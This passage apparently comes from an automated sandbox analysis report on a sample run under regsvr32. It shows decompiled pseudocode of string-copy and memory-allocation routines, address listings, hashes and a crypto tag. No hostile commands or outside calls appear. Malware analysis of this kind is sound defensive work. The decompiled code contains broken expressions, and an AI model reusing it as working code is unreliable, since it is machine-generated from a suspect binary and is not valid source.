								_v52 = 0;
								_v44 = 0;
								_t604 = _v48;
								if(_t371 > 0) {
									_t675 = _t371 >> 1;
									if(_t675 == 0) {
										_t676 = 1;
									} else {
										_v40 = _t505;
										_t509 = _t371;
										_t694 = 0;
										do {
											_t532 =  *((intOrPtr*)(_t604 + _t694 * 8));
											if( *((intOrPtr*)(_t604 + _t694 * 8)) != 0) {
												_push(1);
												E004787B0(_t532);
												_t604 = _v52;
											}
											_t533 =  *((intOrPtr*)(_t604 + 4 + _t694 * 8));
											if( *((intOrPtr*)(_t604 + 4 + _t694 * 8)) != 0) {
												_push(1);
												E004787B0(_t533);
												_t604 = _v52;
											}
											_t694 = _t694 + 1;
										} while (_t694 < _t675);
										_t534 = _t694;
										_t371 = _t509;
										_t505 = _v40;
										_t333 = _t534 + 1; // 0x2
										_t676 = _t694 + _t333;
									}
									_t334 = _t676 - 1; // 0x1
									if(_t334 < _t371) {
										_t530 =  *((intOrPtr*)(_t604 + _t676 * 4 - 4));
										if( *((intOrPtr*)(_t604 + _t676 * 4 - 4)) != 0) {
											_push(1);
											E004787B0(_t530);
											_t604 = _v52;
										}
									}
								}
							} else {
								_v52 = _t604;
								 *_t505 = 0;
								 *(_t505 + 8) = 0;
								if(_t556 <= 0) {
									L196:
									_t605 =  *(_t505 + 4);
								} else {
									_t605 =  *(_t505 + 4);
									_t424 = _t556 >> 1;
									if(_t424 == 0) {
										_t425 = 1;
									} else {
										_v60 = _t556;
										_t685 = 0;
										_t702 = _t424;
										do {
											_t558 =  *((intOrPtr*)(_t605 + _t685 * 8));
											if( *((intOrPtr*)(_t605 + _t685 * 8)) != 0) {
												_push(1);
												E004787B0(_t558);
												_t605 =  *(_t505 + 4);
											}
											_t559 =  *((intOrPtr*)(_t605 + 4 + _t685 * 8));
											if( *((intOrPtr*)(_t605 + 4 + _t685 * 8)) != 0) {
												_push(1);
												E004787B0(_t559);
												_t605 =  *(_t505 + 4);
											}
											_t685 = _t685 + 1;
										} while (_t685 < _t702);
										_t556 = _v60;
										_t217 = _t685 + 1; // 0x2
										_t425 = _t685 + _t217;
									}
									_t218 = _t425 - 1; // 0x1
									if(_t218 < _t556) {
										_t557 =  *((intOrPtr*)(_t605 + _t425 * 4 - 4));
										if( *((intOrPtr*)(_t605 + _t425 * 4 - 4)) != 0) {
											_push(1);
											E004787B0(_t557);
											goto L196;
										}
									}
								}
								_push(4);
								_push(_t605);
								E004710B0();
								_t723 = _t723 + 8;
								_t527 = _v52;
								 *(_t505 + 4) = 0;
								if(_t527 != 0) {
									_t672 = (_t527 - 0x00000001 >> 0x00000001 >> 0x0000001e) + _t527 - 0x00000001 & 0xfffffffc;
									_push(0x10 + _t672 * 4);
									 *(_t505 + 8) = _t672 + 4;
									_t368 = E00471030();
									_t723 = _t723 + 4;
									_t610 = _v52;
									 *(_t505 + 4) = _t368;
									 *_t505 = _t610;
									if(_t610 <= 0) {
										goto L198;
									} else {
										_v40 = _t505;
										_t673 = 0;
										asm("pxor xmm0, xmm0");
										do {
											_push(8);
											_t673 = _t673 + 1;
											_t693 = E00471030();
											_t723 = _t723 + 4;
											if(_t693 == 0) {
												_t693 = 0;
												_t508 = _t673 * 4;
											} else {
												_t376 = _t673 - 1;
												if(_t376 < 0 || _t376 >= _v52) {
													_t377 = 0;
													_t508 = _t673 * 4;
												} else {
													_t508 = _t673 * 4;
													_t377 =  *(_v48 + _t508 - 4);
												}
												 *_t693 = 0;
												 *(_t693 + 4) = 0;
												_t614 =  *_t377;
												if(_t614 == 0 ||  *_t614 == 0) {
													_push(0x40);
													_t378 = E00471030();
													_v84 = _t378;
													_t723 = _t723 + 4;
													_t615 =  *_t693;
													if(_t615 == 0) {
														 *_t378 = 0;
													} else {
														if(_v84 != 0) {
															_t535 = _t378;
															_t381 =  *_t615;
															 *_t535 = _t381;
															if(_t381 != 0) {
																_v56 = _t693;
																_t382 = 0;
																_v64 = _t673;
																_t695 = _t535;
																while(1) {
																	_t382 = _t382 + 1;
																	_t548 =  *((char*)(_t615 + _t382 * 2 - 1));
																	 *((char*)(_t695 + _t382 * 2 - 1)) = _t548;
																	if(_t548 == 0) {
																		break;
																	}
																	_t549 =  *((char*)(_t615 + _t382 * 2));
																	 *((char*)(_t695 + _t382 * 2)) = _t549;
																	if(_t549 != 0) {
																		continue;
																	}
																	break;
																}
																_t693 = _v56;
																_t673 = _v64;
															}
														}
														_push(1);
														_push(_t615);
														E004710B0();
														_t723 = _t723 + 8;
													}
													 *_t693 = _v84;
													 *(_t693 + 4) = 0x40;
												} else {
													_t537 = _t614 & 0x0000000f;
													if(_t537 == 0) {
														L212:
														asm("pxor xmm1, xmm1");
														_t388 =  ~( ~_t537 + 0x0000000f & 0x0000000f) + 0x7fffffff;
														_v60 = _t388;
														_v64 = _t673;
														_t677 = _t388;
														while(1) {
															asm("movdqu xmm0, [edx+ecx]");
															asm("pcmpeqb xmm0, xmm1");
															asm("pmovmskb eax, xmm0");
															if(_t388 != 0) {
																break;
															}
															_t537 = _t537 + 0x10;
															if(_t537 < _t677) {
																continue;
															} else {
																_v60 = _t677;
																_t673 = _v64;
																if(_v60 >= 0x7fffffff) {
																	L219:
																	_v60 = 0x7fffffff;
																} else {
																	_t407 = _v60;
																	while( *((char*)(_t407 + _t614)) != 0) {
																		_t407 = _t407 + 1;
																		if(_t407 < 0x7fffffff) {
																			continue;
																		} else {
																			goto L219;
																		}
																		goto L220;
																	}
																	goto L279;
																}
															}
															goto L220;
														}
														asm("bsf eax, eax");
														_t673 = _v64;
														_v60 = _t388 + _t537;
													} else {
														_v60 = 0;
														_t407 = _v60;
														_t537 =  ~_t537 + 0x10;
														while( *((char*)(_t407 + _t614)) != 0) {
															_t407 = _t407 + 1;
															if(_t407 < _t537) {
																continue;
															} else {
																goto L212;
															}
															goto L220;
														}
														L279:
														_v60 = _t407;
													}
													L220:
													_t392 =  <=  ? 0x40 : _v60 + 1;
													if(_t392 > 0) {
														_t543 = (_t392 >> 5 >> 0x1a) + _t392 >> 6;
														_v72 = _t543;
														_t393 = _t392 & 0x8000003f;
														if(_t393 < 0) {
															_t393 = (_t393 - 0x00000001 | 0xffffffc0) + 1;
														}
														_t545 = _t543 + (0 | _t393 > 0x00000000) << 6;
														_v72 = _t545;
														_push(_t545);
														_v76 = _t614;
														_t396 = E00471030();
														_t614 = _v76;
														_t546 = _t396;
														_t723 = _t723 + 4;
														_t397 =  *_t693;
														_v68 = _t397;
														if(_t397 == 0) {
															 *_t546 = 0;
														} else {
															if(_t546 != 0) {
																_t403 =  *_t397;
																 *_t546 = _t403;
																if(_t403 != 0) {
																	_v56 = _t693;
																	_t404 = 0;
																	_v76 = _t614;
																	_v64 = _t673;
																	_t697 = _v68;
																	while(1) {
																		_t404 = _t404 + 1;
																		_t616 =  *((char*)(_t697 + _t404 * 2 - 1));
																		 *((char*)(_t546 + _t404 * 2 - 1)) = _t616;
																		if(_t616 == 0) {
																			break;
																		}
																		_t617 =  *((char*)(_t697 + _t404 * 2));
																		 *((char*)(_t546 + _t404 * 2)) = _t617;
																		if(_t617 != 0) {
																			continue;
																		}
																		break;
																	}
																	_t693 = _v56;
																	_t614 = _v76;
																	_t673 = _v64;
																}
															}
															_push(1);
															_push(_v68);
															_v80 = _t546;
															_v76 = _t614;
															E004710B0();
															_t614 = _v76;
															_t546 = _v80;
															_t723 = _t723 + 8;
														}
														 *(_t693 + 4) = _v72;
														 *_t693 = _t546;
													} else {
														_t546 = 0;
													}
													if(_t546 != 0) {
														_v64 = _t673;
														_v56 = _t693;
														_t696 = 0;
														_t678 = _v60;
														while(1) {
															_t696 = _t696 + 1;
															_t400 =  *((char*)(_t696 + _t614 - 1));
															 *((char*)(_t696 + _t546 - 1)) = _t400;
															if(_t678 != 0 && _t696 == _t678) {
																break;
															}
															if(_t400 != 0) {
																continue;
															} else {
																_t693 = _v56;
																_t673 = _v64;
															}
															goto L251;
														}
														_t693 = _v56;
														_t673 = _v64;
														 *((char*)(_t696 + _t546)) = 0;
													}
												}
											}
											L251:
											_t612 = _v40;
											 *( *((intOrPtr*)(_t612 + 4)) + _t508 - 4) = _t693;
										} while (_t673 <  *_t612);
										_t505 = _t612;
										_t371 = _v52;
										goto L253;
									}
								} else {
									L198:
									_v52 = 0;
									_v44 = 0;
									_t604 = _v48;
								}
							}
						}
					}
					_push(4);
					_push(_t604);
					E004710B0();
					_v48 = 0;
					return _t505;
				}
				L301:
			}

0x00483ec9
0x00483ecc
0x00483ece
0x00483ed1
0x00484b36
0x00483ed7
0x00483ed7
0x00484c80
0x00484c8c
0x00484c90
0x00000000
0x00484c92
0x00000000
0x00484c92
0x00483edd
0x00483edf
0x00483ee3
0x00483ee7
0x00483eeb
0x00483ef3
0x00483ef7
0x00483efd
0x00483f03
0x00483f0b
0x00483f0f
0x00483f13
0x00483f17
0x00484c77
0x00484c79
0x00483f1d
0x00483f1f
0x00483f22
0x00483f3a
0x00483f3e
0x00483f4a
0x00483f4f
0x00483f4f
0x00483f54
0x00483f58
0x00483f5e
0x00000000
0x00000000
0x00483f64
0x00483f69
0x00000000
0x00483f6b
0x00483f70
0x00483f84
0x00483f84
0x00000000
0x00483f72
0x00483f72
0x00483f7c
0x00483f82
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00483f82
0x00000000
0x00483f72
0x00483f70
0x00000000
0x00483f69
0x00484c70
0x00484c73
0x00000000
0x00483f24
0x00483f26
0x00483f28
0x00483f2b
0x00483f35
0x00483f38
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00483f38
0x00484c61
0x00484c63
0x00483f89
0x00483f89
0x00483f8e
0x00483f90
0x00483f99
0x00483f99
0x00483f9e
0x00000000
0x00000000
0x00483fa9
0x00000000
0x00000000
0x00000000
0x00483fa9
0x00484c53
0x00484c56
0x00000000
0x00484c5c
0x00000000
0x00484c5c
0x00000000
0x00484c56
0x00484c69
0x00484c69
0x00484c69
0x00484c63
0x00483f22
0x00483fab
0x00483fad
0x00483fae
0x00483fb2
0x00483fb8
0x00483fc0
0x00483fc1
0x00483fc5
0x00483fca
0x00483fce
0x00483fd2
0x00483fd6
0x00483fe0
0x00483fe3
0x00483fe3
0x00483fe8
0x00000000
0x00000000
0x00483ff3
0x00000000
0x00000000
0x00000000
0x00483ff3
0x00484c36
0x00484c37
0x00484c38
0x00484c3d
0x00000000
0x00484c43
0x00000000
0x00484c43
0x00000000
0x00484c3d
0x00483ff5
0x00483ff5
0x00483ff9
0x00483ff9
0x00483fff
0x0048417f
0x0048417f
0x00484186
0x00484188
0x0048418b
0x00484005
0x00484007
0x00484c2f
0x0048400d
0x0048400f
0x00484012
0x00484026
0x0048402a
0x00484036
0x0048403b
0x0048403b
0x00484040
0x00484044
0x0048404a
0x00000000
0x00000000
0x00484050
0x00484055
0x00000000
0x00484057
0x0048405c
0x0048406c
0x0048406c
0x00000000
0x0048405e
0x00484064
0x0048406a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0048406a
0x0048405e
0x0048405c
0x00000000
0x00484055
0x00484c25
0x00484c28
0x00484014
0x00484016
0x00484018
0x0048401b
0x00484021
0x00484024
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00484024
0x0048401b
0x00484012
0x00484071
0x00484075
0x0048407a
0x0048407d
0x00484081
0x00484087
0x00484087
0x0048408d
0x00000000
0x0048409d
0x0048409f
0x004840a1
0x004840a6
0x004840a9
0x004840bd
0x004840c1
0x004840cd
0x004840d3
0x004840d3
0x004840d8
0x004840dc
0x004840e2
0x00000000
0x00000000
0x004840e8
0x004840ed
0x00000000
0x004840ef
0x004840f5
0x00484106
0x00484106
0x00000000
0x004840f7
0x004840fd
0x00484104
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00484104
0x004840f7
0x004840f5
0x00000000
0x004840ed
0x00484b40
0x00484b43
0x004840ab
0x004840ad
0x004840af
0x004840b2
0x004840b8
0x004840bb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004840bb
0x004840b2
0x004840a9
0x0048410b
0x00484110
0x00484116
0x0048411b
0x0048412b
0x0048412e
0x00484134
0x0048413c
0x0048413c
0x00484149
0x0048414a
0x00484157
0x00484159
0x0048415c
0x0048415e
0x00484160
0x00484163
0x00484163
0x00484164
0x00484169
0x0048416f
0x00000000
0x00000000
0x0048417b
0x00000000
0x00000000
0x0048417d
0x00000000
0x0048417b
0x00484b37
0x0048411d
0x0048411d
0x0048411d
0x0048411b
0x0048408d
0x0048418e
0x00484192
0x00484199
0x0048419d
0x004841a1
0x004841a9
0x00484311
0x00484313
0x00484313
0x0048431a
0x0048431c
0x00484323
0x00484327
0x0048432a
0x0048432e
0x0048437a
0x00484330
0x00484335
0x00484337
0x0048433b
0x0048433e
0x00484342
0x00484344
0x00484347
0x00484349
0x0048434b
0x0048434b
0x0048434c
0x00484351
0x00484357
0x00000000
0x00000000
0x00484359
0x0048435d
0x00484362
0x00000000
0x00000000
0x00000000
0x00484362
0x00484364
0x00484364
0x00484367
0x00484367
0x00484369
0x0048436b
0x0048436c
0x00484371
0x00484371
0x00484381
0x00484383
0x00484383
0x004841b8
0x004841ba
0x004841bd
0x004841d5
0x004841d9
0x004841e5
0x004841eb
0x004841eb
0x004841f0
0x004841f4
0x004841fa
0x00000000
0x00000000
0x00484200
0x00484205
0x00000000
0x00484207
0x0048420d
0x00484222
0x00484222
0x0048420f
0x0048420f
0x00484219
0x00484220
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00484220
0x00000000
0x0048420f
0x0048420d
0x00000000
0x00484205
0x00484b6c
0x00484b6f
0x00000000
0x004841bf
0x004841c1
0x004841c3
0x004841c6
0x004841d0
0x004841d3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004841d3
0x00484b53
0x00484b56
0x00484b64
0x00484b64
0x00484b56
0x00484227
0x0048422c
0x00484232
0x00484238
0x0048424e
0x00484252
0x00484258
0x00484260
0x00484260
0x0048426e
0x00484271
0x00484275
0x0048427b
0x0048427d
0x00484280
0x00484284
0x004842d5
0x00484286
0x00484288
0x0048428a
0x0048428d
0x00484291
0x00484295
0x00484299
0x0048429c
0x0048429e
0x0048429e
0x0048429f
0x004842a4
0x004842aa
0x00000000
0x00000000
0x004842ac
0x004842b0
0x004842b5
0x00000000
0x00000000
0x00000000
0x004842b5
0x004842b7
0x004842bb
0x004842bb
0x004842be
0x004842be
0x004842c0
0x004842c2
0x004842c3
0x004842c7
0x004842cc
0x004842d0
0x004842d0
0x004842dc
0x004842df
0x0048423a
0x0048423a
0x0048423a
0x004842e3
0x004842f1
0x004842f3
0x004842f3
0x004842f4
0x004842f9
0x004842ff
0x00000000
0x00000000
0x0048430b
0x00000000
0x00000000
0x0048430d
0x00000000
0x0048430b
0x00484b4a
0x00484b4a
0x004842e3
0x004841a9
0x0048438a
0x0048438a
0x0048438c
0x0048438d
0x00484392
0x00484395
0x00484399
0x0048439b
0x004843a5
0x004843a7
0x004843a9
0x004843b1
0x004843b7
0x00484c04
0x00484c18
0x00484c18
0x00484c1c
0x00484c06
0x00484c06
0x00484c06
0x00484c0a
0x00484c0e
0x00484c10
0x00000000
0x00484c10
0x004843bd
0x004843bd
0x004843bf
0x004843c7
0x004843c9
0x004843cd
0x004843d1
0x004843d5
0x004843dd
0x004843e1
0x004843e9
0x004843ec
0x00484404
0x00484408
0x00484414
0x00484418
0x0048441e
0x0048441e
0x00484423
0x00484427
0x0048442d
0x00000000
0x00000000
0x00484433
0x00484438
0x00000000
0x0048443a
0x0048443a
0x00484444
0x00000000
0x00484446
0x00484446
0x00484450
0x00484457
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00484457
0x00000000
0x00484446
0x00484444
0x00000000
0x00484438
0x00484be6
0x00484be8
0x00484beb
0x00484bef
0x00000000
0x004843ee
0x004843f0
0x004843f2
0x004843f5
0x004843ff
0x00484402
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00484402
0x00484bf1
0x00484bf3
0x00484459
0x00484459
0x00484461
0x00484466
0x00484469
0x0048446d
0x00484473
0x00484478
0x00484483
0x00484489
0x00484498
0x0048449d
0x0048449f
0x004844a3
0x004844a8
0x004844ab
0x004844af
0x004844af
0x004844b3
0x004844b7
0x004844cd
0x004844d2
0x004844d2
0x004844d5
0x004844dc
0x004844de
0x004844e3
0x004846f5
0x004844e9
0x004844eb
0x004844ed
0x004844f2
0x00484685
0x0048468c
0x00484690
0x00484693
0x00484697
0x004846e3
0x00484699
0x0048469e
0x004846a0
0x004846a4
0x004846a7
0x004846ab
0x004846ad
0x004846b1
0x004846b3
0x004846b5
0x004846b5
0x004846b6
0x004846bb
0x004846c1
0x00000000
0x00000000
0x004846c3
0x004846c7
0x004846cc
0x00000000
0x00000000
0x00000000
0x004846cc
0x004846ce
0x004846ce
0x004846ab
0x004846d2
0x004846d4
0x004846d5
0x004846da
0x004846da
0x004846ea
0x004846ec
0x00484501
0x00484503
0x00484506
0x00484528
0x0048452c
0x00484538
0x0048453e
0x00484542
0x00484544
0x00484544
0x00484549
0x0048454d
0x00484553
0x00000000
0x00000000
0x00484559
0x0048455e
0x00000000
0x00484560
0x00484560
0x0048456c
0x00484582
0x00484582
0x0048456e
0x0048456e
0x00484570
0x0048457a
0x00484580
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00484580
0x00484b84
0x00484b84
0x0048456c
0x00000000
0x0048455e
0x00484b8d
0x00484b92
0x00484508
0x00484508
0x00484512
0x00484516
0x00484519
0x00484523
0x00484526
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00484526
0x00484b9b
0x00484b9b
0x0048458a
0x00484593
0x00484599
0x0048459e
0x004845b7
0x004845ba
0x004845be
0x004845c4
0x004845cc
0x004845cc
0x004845d8
0x004845db
0x004845df
0x004845e0
0x004845e5
0x004845e9
0x004845ec
0x004845f0
0x0048463c
0x004845f2
0x004845f7
0x004845f9
0x004845fb
0x004845fe
0x00484602
0x00484604
0x00484607
0x00484609
0x0048460d
0x0048460f
0x0048460f
0x00484610
0x00484615
0x0048461b
0x00000000
0x00000000
0x0048461d
0x00484621
0x00484626
0x00000000
0x00000000
0x00000000
0x00484626
0x00484628
0x0048462b
0x0048462b
0x00484602
0x0048462f
0x00484631
0x00484632
0x00484637
0x00484637
0x00484647
0x0048464a
0x004845a0
0x004845a0
0x004845a0
0x00484651
0x00484657
0x0048465b
0x0048465d
0x00484661
0x00484665
0x00484665
0x00484666
0x0048466b
0x00484671
0x00000000
0x00000000
0x0048467d
0x00000000
0x0048467f
0x0048467f
0x0048467f
0x00000000
0x0048467d
0x00484b77
0x00484b7b
0x00484b7b
0x00484651
0x004844f2
0x004846f7
0x00484703
0x0048470c
0x0048470d
0x00484711
0x00000000
0x00484bf9
0x00484bf3
0x004843ec
0x00484713
0x00484713
0x0048471d
0x00484721
0x00484725
0x0048472a
0x00484a96
0x00484a98
0x00484a9c
0x00484aa0
0x00484aa6
0x00484aaa
0x00484aac
0x00484bd2
0x00484ab2
0x00484ab4
0x00484ab8
0x00484aba
0x00484abc
0x00484abc
0x00484ac1
0x00484ac3
0x00484ac5
0x00484aca
0x00484aca
0x00484ace
0x00484ad4
0x00484ad6
0x00484ad8
0x00484add
0x00484add
0x00484ae1
0x00484ae2
0x00484ae6
0x00484ae8
0x00484aea
0x00484aee
0x00484aee
0x00484aee
0x00484af2
0x00484af7
0x00484af9
0x00484aff
0x00484b01
0x00484b03
0x00484b08
0x00484b08
0x00484aff
0x00484af7
0x00484730
0x00484730
0x00484736
0x00484738
0x0048473d
0x0048479a
0x0048479a
0x0048473f
0x00484741
0x00484744
0x00484746
0x00484bdc
0x0048474c
0x0048474c
0x00484750
0x00484752
0x00484754
0x00484754
0x00484759
0x0048475b
0x0048475d
0x00484762
0x00484762
0x00484765
0x0048476b
0x0048476d
0x0048476f
0x00484774
0x00484774
0x00484777
0x00484778
0x0048477c
0x00484780
0x00484780
0x00484780
0x00484784
0x00484789
0x0048478b
0x00484791
0x00484793
0x00484795
0x00000000
0x00484795
0x00484791
0x00484789
0x0048479d
0x0048479f
0x004847a0
0x004847a5
0x004847a8
0x004847ac
0x004847b5
0x004847d6
0x004847e0
0x004847e4
0x004847e7
0x004847ec
0x004847ef
0x004847f3
0x004847f6
0x004847fa
0x00000000
0x004847fc
0x004847fc
0x00484800
0x00484802
0x00484806
0x00484806
0x00484808
0x0048480e
0x00484810
0x00484815
0x00484a74
0x00484a76
0x0048481b
0x0048481d
0x0048481e
0x00484826
0x00484828
0x00484831
0x00484835
0x0048483c
0x0048483c
0x00484842
0x00484844
0x00484847
0x0048484b
0x00484a04
0x00484a06
0x00484a0b
0x00484a0f
0x00484a12
0x00484a16
0x00484a63
0x00484a18
0x00484a1c
0x00484a1e
0x00484a20
0x00484a23
0x00484a27
0x00484a29
0x00484a2d
0x00484a2f
0x00484a33
0x00484a35
0x00484a35
0x00484a36
0x00484a3b
0x00484a41
0x00000000
0x00000000
0x00484a43
0x00484a47
0x00484a4c
0x00000000
0x00000000
0x00000000
0x00484a4c
0x00484a4e
0x00484a52
0x00484a52
0x00484a27
0x00484a56
0x00484a58
0x00484a59
0x00484a5e
0x00484a5e
0x00484a69
0x00484a6b
0x0048485a
0x0048485c
0x0048485f
0x00484881
0x00484885
0x00484891
0x00484896
0x0048489a
0x0048489e
0x004848a0
0x004848a0
0x004848a5
0x004848a9
0x004848af
0x00000000
0x00000000
0x004848b5
0x004848ba
0x00000000
0x004848bc
0x004848bc
0x004848c0
0x004848cc
0x004848e4
0x004848e4
0x004848ce
0x004848ce
0x004848d2
0x004848dc
0x004848e2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004848e2
0x00000000
0x004848d2
0x004848cc
0x00000000
0x004848ba
0x00484bc0
0x00484bc5
0x00484bc9
0x00484861
0x00484861
0x0048486b
0x0048486f
0x00484872
0x0048487c
0x0048487f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0048487f
0x00484bb7
0x00484bb7
0x00484bb7
0x004848ec
0x004848fb
0x00484900
0x00484913
0x00484916
0x0048491a
0x0048491f
0x00484927
0x00484927
0x00484934
0x00484937
0x0048493b
0x0048493c
0x00484940
0x00484945
0x00484949
0x0048494b
0x0048494e
0x00484950
0x00484956
0x004849bc
0x00484958
0x0048495a
0x0048495c
0x0048495f
0x00484963
0x00484965
0x00484969
0x0048496b
0x0048496f
0x00484973
0x00484977
0x00484977
0x00484978
0x0048497d
0x00484983
0x00000000
0x00000000
0x00484985
0x00484989
0x0048498e
0x00000000
0x00000000
0x00000000
0x0048498e
0x00484990
0x00484994
0x00484998
0x00484998
0x00484963
0x0048499c
0x0048499e
0x004849a2
0x004849a6
0x004849aa
0x004849af
0x004849b3
0x004849b7
0x004849b7
0x004849c3
0x004849c6
0x00484902
0x00484902
0x00484902
0x004849ca
0x004849d2
0x004849d6
0x004849da
0x004849dc
0x004849e0
0x004849e0
0x004849e1
0x004849e6
0x004849ec
0x00000000
0x00000000
0x004849f8
0x00000000
0x004849fa
0x004849fa
0x004849fe
0x004849fe
0x00000000
0x004849f8
0x00484ba6
0x00484baa
0x00484bae
0x00484bae
0x004849ca
0x0048484b
0x00484a7d
0x00484a7d
0x00484a84
0x00484a88
0x00484a90
0x00484a92
0x00000000
0x00484a92
0x004847b7
0x004847b7
0x004847b9
0x004847bd
0x004847c1
0x004847c1
0x004847b5
0x0048472a
0x004843b7
0x00484b0c
0x00484b0e
0x00484b0f
0x00484b17
0x00484b2a
0x00484b2a
0x00000000

Strings

, xrefs: 00483EF7

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3688684798
Opcode ID: 115dd788e1e19c15c086643f8b0350148a1dfa9beefc92e8da698a9ebb6e2083
Instruction ID: dee77af76afd29f0412512b733023d5b5e3485791b337e499745dd04235d1b39
Opcode Fuzzy Hash: 115dd788e1e19c15c086643f8b0350148a1dfa9beefc92e8da698a9ebb6e2083
Instruction Fuzzy Hash: A792E5706083538BD725EE29848072FB7E1BFD5314F188E6EE8959B391E738D941C78A

Uniqueness

Uniqueness Score: -1.00%

Function 004862F0, Relevance: 2.2, Strings: 1, Instructions: 961
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E004862F0(intOrPtr* __ecx, signed int __edx, void* __eflags, char _a4) {
				intOrPtr* _v24;
				char _v32;
				intOrPtr _v36;
				unsigned int _v40;
				signed int _v44;
				signed int _v52;
				char _v56;
				unsigned int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _t264;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				void* _t272;
				char _t278;
				char _t279;
				char* _t281;
				signed int _t282;
				char _t283;
				void* _t287;
				char _t290;
				char _t291;
				char* _t293;
				signed int _t294;
				char _t295;
				signed int _t304;
				intOrPtr* _t306;
				intOrPtr* _t308;
				signed int _t310;
				signed int _t311;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				char* _t320;
				char* _t321;
				unsigned int _t322;
				unsigned int _t327;
				signed int _t329;
				signed int _t330;
				signed int _t332;
				signed int _t333;
				signed int _t336;
				signed int _t338;
				signed int _t339;
				signed int _t342;
				char* _t343;
				char* _t344;
				signed int _t346;
				signed int _t348;
				signed int _t349;
				signed int _t352;
				char* _t353;
				char* _t357;
				signed int _t359;
				signed int _t361;
				signed int _t362;
				signed int _t365;
				unsigned int _t375;
				signed int _t377;
				signed int _t381;
				signed int _t387;
				signed int _t389;
				signed int _t390;
				signed int _t395;
				signed int _t407;
				signed int _t417;
				char* _t418;
				char _t420;
				signed int _t421;
				void* _t431;
				char _t432;
				char _t434;
				char _t435;
				char* _t436;
				char _t438;
				char* _t439;
				char _t440;
				signed int _t441;
				void* _t451;
				char _t452;
				char _t454;
				char _t455;
				char* _t456;
				char _t458;
				char _t460;
				char _t461;
				signed int _t463;
				signed int _t465;
				void* _t469;
				char _t471;
				char _t472;
				signed int _t476;
				void* _t478;
				char _t480;
				char _t481;
				void* _t482;
				char _t484;
				char _t485;
				char _t489;
				char _t490;
				char _t491;
				char _t492;
				char _t493;
				char _t494;
				signed int _t497;
				char* _t499;
				void* _t505;
				unsigned int _t506;
				void* _t512;
				char* _t514;
				void* _t520;
				void* _t521;
				void* _t522;
				void* _t523;
				signed int _t524;
				void* _t531;
				void* _t537;
				void* _t543;
				signed int _t544;
				signed int _t548;
				void* _t551;
				void* _t552;
				void* _t553;

				_t306 = __ecx;
				_push(0x40);
				_t496 = __edx;
				 *__ecx = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				_t514 = E00471030();
				_t551 = (_t548 & 0xfffffff0) - 0x34 + 4;
				_t320 =  *__ecx;
				if(_t320 == 0) {
					 *_t514 = 0;
				} else {
					if(_t514 != 0) {
						_t492 =  *_t320;
						 *_t514 = _t492;
						if(_t492 != 0) {
							_v68 = __edx;
							_t304 = 0;
							while(1) {
								_t304 = _t304 + 1;
								_t493 =  *((char*)(_t320 + _t304 * 2 - 1));
								 *((char*)(_t514 + _t304 * 2 - 1)) = _t493;
								if(_t493 == 0) {
									break;
								}
								_t494 =  *((char*)(_t320 + _t304 * 2));
								 *((char*)(_t514 + _t304 * 2)) = _t494;
								if(_t494 != 0) {
									continue;
								}
								break;
							}
							_t496 = _v68;
						}
					}
					_push(1);
					_push(_t320);
					E004710B0();
					_t551 = _t551 + 8;
				}
				_v44 = 0;
				_push(0x40);
				 *_t306 = _t514;
				 *((intOrPtr*)(_t306 + 4)) = 0x40;
				_t264 = E00471030();
				_t552 = _t551 + 4;
				_t321 = _v44;
				if(_t321 == 0) {
					 *_t264 = 0;
					_v40 = 0x40;
					_v44 = _t264;
					goto L18;
				} else {
					if(_t264 == 0) {
						_push(1);
						_push(_t321);
						E004710B0();
						_t552 = _t552 + 8;
						_v40 = 0x40;
						_t520 = 0;
						_v44 = 0;
						goto L29;
					} else {
						_t489 =  *_t321;
						 *_t264 = _t489;
						if(_t489 != 0) {
							_v40 = 0;
							_t544 = 0;
							_v68 = _t496;
							while(1) {
								_t544 = _t544 + 1;
								_t490 =  *((char*)(_t321 + _t544 * 2 - 1));
								 *((char*)(_t264 + _t544 * 2 - 1)) = _t490;
								if(_t490 == 0) {
									break;
								}
								_t491 =  *((char*)(_t321 + _t544 * 2));
								 *((char*)(_t264 + _t544 * 2)) = _t491;
								if(_t491 != 0) {
									continue;
								}
								break;
							}
							_t496 = _v68;
						}
						_push(1);
						_push(_t321);
						_v64 = _t264;
						E004710B0();
						_t264 = _v64;
						_t552 = _t552 + 8;
						_v40 = 0x40;
						_v44 = _t264;
						L18:
						_t387 = _t264 & 0x0000000f;
						if(_t387 == 0) {
							L22:
							asm("pxor xmm0, xmm0");
							_t520 =  ~( ~_t387 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							while(1) {
								asm("movdqu xmm1, [eax+edx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb ecx, xmm1");
								if(_t321 != 0) {
									break;
								}
								_t387 = _t387 + 0x10;
								if(_t387 < _t520) {
									continue;
								} else {
									if(_t520 >= 0x7fffffff) {
										L28:
										_t520 = 0x7fffffff;
										goto L29;
									} else {
										while( *((char*)(_t520 + _t264)) != 0) {
											_t520 = _t520 + 1;
											if(_t520 < 0x7fffffff) {
												continue;
											} else {
												goto L28;
											}
											goto L30;
										}
										goto L250;
									}
								}
								goto L30;
							}
							asm("bsf esi, ecx");
							_t520 = _t520 + _t387;
							goto L250;
						} else {
							_t520 = 0;
